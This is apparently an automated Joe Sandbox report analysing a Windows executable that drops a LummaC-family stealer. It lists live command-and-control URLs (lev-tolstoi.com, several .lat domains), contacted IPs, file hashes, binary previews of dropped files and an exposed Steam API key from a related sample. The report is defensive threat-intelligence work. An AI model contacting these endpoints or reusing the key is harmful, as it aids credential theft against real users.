                                                                                                                                                                https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngEpson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&amp;l=english&aEpson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmp, Epson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://store.steampowered.com/steam_refunds/Epson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&aEpson.com, 0000000C.00000002.2468469849.0000000003A28000.00000004.00000800.00020000.00000000.sdmp, Epson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900Epson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016Epson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&amp;l=eEpson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmp, Epson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://slipperyloo.lat:443/apiEpson.com, 0000000C.00000002.2467784156.00000000014B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                              unknown
                                                                                                                                                                              https://lev-tolstoi.com:443/api(DEpson.com, 0000000C.00000002.2467784156.00000000014B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                              unknown
                                                                                                                                                                              https://steamcommunity.com/workshop/Epson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://login.steampowered.com/Epson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbbEpson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&amp;l=english&amp;_cEpson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmp, Epson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://store.steampowered.com/legal/Epson.com, 0000000C.00000002.2468469849.0000000003A28000.00000004.00000800.00020000.00000000.sdmp, Epson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&amp;l=enEpson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmp, Epson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&amp;l=engEpson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmp, Epson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://lev-tolstoi.com/api=Epson.com, 0000000C.00000002.2468098452.0000000003903000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                            unknown
                                                                                                                                                                                            https://tentabatte.lat:443/apiEpson.com, 0000000C.00000002.2467784156.00000000014B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&amp;l=english&aEpson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmp, Epson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&amp;l=englEpson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmp, Epson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://recaptcha.netEpson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://store.steampowered.com/Epson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=oOCAGrkRfpQ6&amp;l=eEpson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmp, Epson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.pngEpson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          http://127.0.0.1:27060Epson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpgEpson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gifEpson.com, 0000000C.00000002.2468469849.0000000003A28000.00000004.00000800.00020000.00000000.sdmp, Epson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://lev-tolstoi.com/pisEpson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                https://wordyfindy.lat:443/apivEpson.com, 0000000C.00000002.2467784156.00000000014B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                                                                                • 75% < No. of IPs
                                                                                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                104.21.66.86
                                                                                                                                                                                                                lev-tolstoi.comUnited States
                                                                                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                104.102.49.254
                                                                                                                                                                                                                steamcommunity.comUnited States
                                                                                                                                                                                                                16625AKAMAI-ASUSfalse
                                                                                                                                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                Analysis ID:1581505
                                                                                                                                                                                                                Start date and time:2024-12-27 22:56:05 +01:00
                                                                                                                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                Overall analysis duration:0h 5m 40s
                                                                                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                Report type:full
                                                                                                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                Number of analysed new started processes analysed:16
                                                                                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                                                                                Technologies:
                                                                                                                                                                                                                • HCA enabled
                                                                                                                                                                                                                • EGA enabled
                                                                                                                                                                                                                • AMSI enabled
                                                                                                                                                                                                                Analysis Mode:default
                                                                                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                                                                                Sample name:SoftWare(1).exe
                                                                                                                                                                                                                Detection:MAL
                                                                                                                                                                                                                Classification:mal100.troj.evad.winEXE@24/22@12/2
                                                                                                                                                                                                                EGA Information:
                                                                                                                                                                                                                • Successful, ratio: 100%
                                                                                                                                                                                                                HCA Information:
                                                                                                                                                                                                                • Successful, ratio: 100%
                                                                                                                                                                                                                • Number of executed functions: 76
                                                                                                                                                                                                                • Number of non-executed functions: 298
                                                                                                                                                                                                                Cookbook Comments:
                                                                                                                                                                                                                • Found application associated with file extension: .exe
                                                                                                                                                                                                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                                                                                                                • Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.245.163.56
                                                                                                                                                                                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                • VT rate limit hit for: SoftWare(1).exe
                                                                                                                                                                                                                TimeTypeDescription
                                                                                                                                                                                                                16:56:54API Interceptor1x Sleep call for process: SoftWare(1).exe modified
                                                                                                                                                                                                                16:56:59API Interceptor10x Sleep call for process: Epson.com modified
                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                104.21.66.86MV ROCKET_PDA.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                • www.ayushigangwar.com/nqn4/?CJBlp=0Brh6Vr8UbBX&T2MpwT=59bmqUDXor7TXV4b71NCQ0d0nCVif23i1yH5+9ZmJc5hgCU7y+ZN9z0btTsWzGv6OrGw
                                                                                                                                                                                                                104.102.49.254r4xiHKy8aM.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                                                                                                                • /ISteamUser/GetFriendList/v1/?key=AE2AE4DBF33A541E83BC08989DB1F397&steamid=76561198400860497
                                                                                                                                                                                                                http://gtm-cn-j4g3qqvf603.steamproxy1.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • www.valvesoftware.com/legal.htm
                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                lev-tolstoi.comForcesLangi.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                • 104.21.66.86
                                                                                                                                                                                                                Leside-.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                • 104.21.66.86
                                                                                                                                                                                                                Vq50tK1Nx2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                • 104.21.66.86
                                                                                                                                                                                                                IzDjbVdHha.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                • 172.67.157.254
                                                                                                                                                                                                                T4qO1i2Jav.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                • 172.67.157.254
                                                                                                                                                                                                                FXdg37pY22.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                • 104.21.66.86
                                                                                                                                                                                                                k0ukcEH.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                • 172.67.157.254
                                                                                                                                                                                                                pVbAZEFIpI.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                • 172.67.157.254
                                                                                                                                                                                                                GxX48twWHA.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                • 104.21.66.86
                                                                                                                                                                                                                ERTL09tA59.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                • 104.21.66.86
                                                                                                                                                                                                                steamcommunity.comForcesLangi.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                • 92.122.104.90
                                                                                                                                                                                                                Leside-.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                • 92.122.104.90
                                                                                                                                                                                                                Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 104.121.10.34
                                                                                                                                                                                                                Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                                                                Vq50tK1Nx2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                • 104.121.10.34
                                                                                                                                                                                                                IzDjbVdHha.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                • 104.121.10.34
                                                                                                                                                                                                                T4qO1i2Jav.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                                                                FXdg37pY22.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                                                                FXdg37pY22.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                                                                k0ukcEH.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                AKAMAI-ASUSForcesLangi.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                • 92.122.104.90
                                                                                                                                                                                                                Leside-.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                • 92.122.104.90
                                                                                                                                                                                                                Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 104.121.10.34
                                                                                                                                                                                                                Vq50tK1Nx2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                • 104.121.10.34
                                                                                                                                                                                                                IzDjbVdHha.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                • 104.121.10.34
                                                                                                                                                                                                                JA7cOAGHym.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                • 23.57.90.162
                                                                                                                                                                                                                grand-theft-auto-5-theme-1-installer_qb8W-j1.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 95.100.135.104
                                                                                                                                                                                                                db0fa4b8db0333367e9bda3ab68b8042.m68k.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                                                                                                                                • 104.73.204.126
                                                                                                                                                                                                                db0fa4b8db0333367e9bda3ab68b8042.spc.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                                                                                                                                • 104.120.124.62
                                                                                                                                                                                                                pVbAZEFIpI.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                                CLOUDFLARENETUSSharcHack.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA StealerBrowse
                                                                                                                                                                                                                • 104.21.73.97
                                                                                                                                                                                                                NewSetup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                • 172.67.157.249
                                                                                                                                                                                                                ForcesLangi.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                • 104.21.66.86
                                                                                                                                                                                                                iviewers.dllGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                • 104.21.60.24
                                                                                                                                                                                                                http://track.rbfcu.org/y.z?l=https://google.com/amp/s/t.ly/5SpZS&r=14387614172&d=18473&p=2&t=hGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                • 104.17.25.14
                                                                                                                                                                                                                launcher.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                • 104.21.58.80
                                                                                                                                                                                                                Leside-.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                • 104.21.66.86
                                                                                                                                                                                                                solara-executor.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 172.67.75.163
                                                                                                                                                                                                                Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 104.21.2.114
                                                                                                                                                                                                                Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 104.21.2.114
                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                a0e9f5d64349fb13191bc781f81f42e1NewSetup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                • 104.21.66.86
                                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                                ForcesLangi.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                • 104.21.66.86
                                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                                iviewers.dllGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                • 104.21.66.86
                                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                                launcher.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                • 104.21.66.86
                                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                                Leside-.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                • 104.21.66.86
                                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                                search.htaGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 104.21.66.86
                                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                                SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                • 104.21.66.86
                                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                                !Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                • 104.21.66.86
                                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                                @Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                • 104.21.66.86
                                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                                Full_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                • 104.21.66.86
                                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\250478\Epson.com!Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                  ZTM2pfyhu3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                    JA7cOAGHym.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                      appFile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                        FloydMounts.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          installer.batGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                            skript.batGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                              din.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                yoda.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                  lem.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                                                    Size (bytes):947288
                                                                                                                                                                                                                                    Entropy (8bit):6.630612696399572
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                                                                                                                                                                                                                    MD5:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                                                                                    SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                                                                                                                                                                                                                    SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                                                                                                                                                                                                                    SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                    Joe Sandbox View:
                                                                                                                                                                                                                                    • Filename: !Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                    • Filename: ZTM2pfyhu3.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                    • Filename: JA7cOAGHym.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                    • Filename: appFile.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                    • Filename: FloydMounts.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                    • Filename: installer.bat, Detection: malicious, Browse
                                                                                                                                                                                                                                    • Filename: skript.bat, Detection: malicious, Browse
                                                                                                                                                                                                                                    • Filename: din.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                    • Filename: yoda.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                    • Filename: lem.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                    File Type:zlib compressed data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):462109
                                                                                                                                                                                                                                    Entropy (8bit):7.999653390321464
                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                    SSDEEP:12288:I9AZ3Qaz5x/r5LqWb9yxxFZ6+iIdeSns2eu+XPh3q:I96z5xz5mK9oE+JDs2e3q
                                                                                                                                                                                                                                    MD5:D366D9562DCDB865FC4355307051CC87
                                                                                                                                                                                                                                    SHA1:BAA25076DAF2CC47AEDBEE12068DF7070F509907
                                                                                                                                                                                                                                    SHA-256:F98D8AB941A9AFF246D77FCD89861AF04F25350498610CA211EF366228B71ACD
                                                                                                                                                                                                                                    SHA-512:D049DCB589A81D088D1A2A6B52950A36A03209E9E8DB2A5EBC704423B20B6D0FB6336AB688591BCFC44614D07162089D1B919B2F0B6B333ED9554FF1C76ED41E
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:(..r<.A1....u..6...?..2.A.<+...z...HG7q..).FG.{.Z..-4.^.|0|..0..qb[..USH"3.HH.7...-..F.%.......I...% 4lFD..Q..46D......+.5.!=.j.}V0.#...:...4<gw..v..,.e.P.bK..z..fi..12#N......Z.]"`.P..x..|../y<h....D...............p{.^.R./.L...4r.=....u,2._[.Xo.1.\:......P.:......aU.g.12...^Is.n^.+...W...I........[lz.M%..?....f.......v@..&.u.......r.0?l.%[Zf....3P.........!....y....,..F......w...^.h.;Fu`...T.9;Cm.v...<4.6.7E....d.Q.h.3....V.{..\.;=.e.+^I.l).Z.h..Y.h(..,.........<%....B...@.+...X.49..fT.........^.E."...X...q...t.%./.!."439...1....O....@.v..`.s..;.Q/.#G.\.iDJ;.Mw_.v....N.....d..c......Y.E;.G.B...]@.yRs.*.../..n).....o.E.N.".....Q.2...t_..]<..,..F.L..F-..dZ...!..........R....)EE>[Gn........{..lr..-.....F.&.n..^..I@K.MK.o..;l.... 7.iq[.z...`..A..9.+'...]Y*..Zf..`]F4p.'.4..z.!..Y.k\X.6i.....8?O.#.q...V..;..8g4K.Q......\.9.P.f+.....Xg.......8.(..a.l..HCh.Yx:."ep.?.C...."...Iw.....#....A%....k2..i...L......].X.r\Lr.....\.......N..c...
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):64512
                                                                                                                                                                                                                                    Entropy (8bit):6.617785423597807
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:1536:7Ku2IwNnPEBiqXv+G/UXT6TvY464qvI932eOypvcLSDC:7ccBiqXvpgF4qv+32eOyKODC
                                                                                                                                                                                                                                    MD5:6CC7AE84FBF098F87BFC6369B817AF45
                                                                                                                                                                                                                                    SHA1:23A60B85F403742C640FA7EE989B6713D4A61C8D
                                                                                                                                                                                                                                    SHA-256:A9EBDAF3706990C9396E76C38957E51DDBA2A9B09D1FFAC5C73B1C346159D417
                                                                                                                                                                                                                                    SHA-512:76B75C6F47E3AD34B8E3C9BB37591026A46E9574712B1F1D0F9937C33555ABDCB3240DB48BAF3E34E3DC246BB5DEB133408EF6FB10BAD20A5A07CB7669F1B321
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:P.u.W....h.....u(.s..u..u.W.u.......8..t.WP.{..._^[].U...TSVW.}.3.W.u..]..u..]..........E......Y...;G...P....u..>csm........~.........~. ...t..~.!...t..~.".........9^........:...9X........,....p..$....E...@..E.........>csm.u*.~..u$.~. ...t..~.!...t..~."...u.9^............9X.tf......@..E.......u.V.X......YY..uD.}.9...y.....].G.h(.M..L...=............M.C....M.;.|..H....U..U....U.E..M..}..M..>csm........~.........~. ...t..~.!...t..~.".....j...9_........u P.E.P.E.P......U.....E..E.U.;U........M.k...E.E...@..E.E.9.......;H........x..@..}..}..E.].........F..@.......U.E...M.E...~+.v..1.u..s........u,.E..M.H....E..M....U.E.E..@.E.;E.t0.E...u.E..u$.E...u .u..0.u.W.u..u..u.V.......,.U.M..E..B.U.;U...&...8].t.j.V....YY8].ue..%....=!...rW9_.u..G .....tH9] uC.G ............w.V.....YY..tU.$9_.v.8]........u$.u PWQR.u.V.w..... ....9X.ud_^[..j.V.9...YY.M......h|.L..E.P.....j....p..b....M.H..E$..u..E.VP.9...W.u..u..P...W........P.....>....U... W.}..?....tTSV......]..x..tGj
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):2808
                                                                                                                                                                                                                                    Entropy (8bit):5.462913383328879
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:48:x9n9mTsCNvEQH5O5U1nPKrhBzM1FoMPhfq1koCqxLVJcd2u+MAyKnFHbQ:bSEA5O5W+MfH5S1CqlVJcI6mlbQ
                                                                                                                                                                                                                                    MD5:1F2B675171ACD895686632A65E9E3DF5
                                                                                                                                                                                                                                    SHA1:A36FC0D6B128CC3ADEE842F73965625330AB0E8A
                                                                                                                                                                                                                                    SHA-256:48D2B664876DADBD3498EA6A1DF4D26EF4B11A3AEFA678F26C81D634773817FD
                                                                                                                                                                                                                                    SHA-512:30F32BB9A5C183DB234075C6A5FCDE95A869D1E04919D7875C15C5A218C6AA46C2F6AF5ED49807C20A239AB6B2A55FD40E9DE3399BA095DC4CC48D88F2B17AAD
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:JIM........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B.............................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):61440
                                                                                                                                                                                                                                    Entropy (8bit):3.7617771452671294
                                                                                                                                                                                                                                    Encrypted:false
